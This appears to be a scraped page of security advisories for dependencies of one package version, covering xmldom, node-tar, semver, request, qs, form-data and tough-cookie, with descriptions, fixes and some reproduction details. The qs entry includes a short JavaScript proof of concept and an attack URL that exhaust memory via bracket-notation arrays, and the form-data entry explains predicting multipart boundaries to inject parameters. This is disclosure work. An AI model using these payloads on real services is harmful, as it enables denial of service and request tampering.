All the vulnerabilities related to the version 1.0.3 of the package
Misinterpretation of malicious XML input
xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.
Update to one of the fixed versions of @xmldom/xmldom (>=0.7.0)
See issue #271 for the status of publishing xmldom to npm or join #270 for Q&A/discussion until it's resolved.
Downstream applications can validate the input and reject the maliciously crafted documents.
Similar to this one reported on the Go standard library:
If you have any questions or comments about this advisory:
xmldom/xmldomnpm owner ls @xmldom/xmldomxmldom allows multiple root nodes in a DOM
xmldom parses XML that is not well-formed because it contains multiple top level elements, and adds all root nodes to the childNodes collection of the Document, without reporting any error or throwing.
This breaks the assumption that there is only a single root node in the tree, which led to https://nvd.nist.gov/vuln/detail/CVE-2022-39299 and is a potential issue for dependents.
Update to @xmldom/xmldom@~0.7.7, @xmldom/xmldom@~0.8.4 (dist-tag latest) or @xmldom/xmldom@>=0.9.0-beta.4 (dist-tag next).
One of the following approaches might help, depending on your use case:
documentElement.childNode.If you have any questions or comments about this advisory:
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package I came across the folder creation process, Basicly if you provide node-tar with a path like this ./a/b/c/foo.txt it would create every folder and sub-folder here a, b and c until it reaches the last folder to create foo.txt, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video
Here's a video show-casing the exploit:
Denial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources
This report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = utils.combine([], leaf); // No arrayLimit check
}
Working code (lib/parse.js:175):
else if (index <= options.arrayLimit) { // Limit checked here
obj = [];
obj[index] = leaf;
}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
Test 1 - Basic bypass:
npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length); // Output: 6 (should be max 5)
Test 2 - DoS demonstration:
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)a[]=value (not indexed a[0]=value)Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)qs.parse(query, { arrayLimit: 100 })Real-world impact:
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf); // No arrayLimit check
}
Fixed code:
if (root === '[]' && options.parseArrays) {
// Use currentArrayLength already calculated at line 147-151
if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
}
// If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
if (currentArrayLength >= options.arrayLimit) {
obj = options.plainObjects ? { __proto__: null } : {};
obj[currentArrayLength] = leaf;
} else {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf);
}
}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.